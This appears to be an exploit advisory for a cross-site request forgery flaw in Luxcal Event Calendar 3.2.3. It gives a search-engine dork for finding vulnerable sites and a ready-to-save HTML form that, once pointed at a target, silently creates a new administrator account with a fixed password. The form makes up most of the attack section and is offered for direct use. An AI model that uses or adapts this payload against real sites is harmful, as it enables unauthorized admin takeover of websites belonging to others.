Headline
Luxcal Event Calendar 3.2.3 Cross Site Request Forgery
Luxcal Event Calendar version 3.2.3 suffers from a cross site request forgery vulnerability.
====================================================================================================================================
| # Title     : Luxcal Event Calendar v3.2.3 CSRF Vulnerability                                                                    |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |
| # Vendor    : https://www.LuxSoft.eu                                                                                             |
| # Dork      : powered by LuxSoft                                                                                                 |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 2.
[+] Set the target site link Save changes and apply .
[+] infected file : index.php
[+] http://127.0.0.1/q7.3/index.php.
[+] save code as poc.html .
<html>
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">
<input type="hidden" name="uname" value="tcyber"/>
<input type="hidden" name="email" value="g4k@hot.mail"/>
<input type="hidden" name="new_pw" value="123456"/>
<input type="hidden" name="userRights" value="9"/>
<input type=’submit’ name=’addExe’ value="Add Profile">
</form>
</html>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 9aylasdjroot.dzLiquidWormHussin-X*D4NB4R *ViRuS_Ra3cH yasMouh CraCkEr  |
=======================================================================================================================================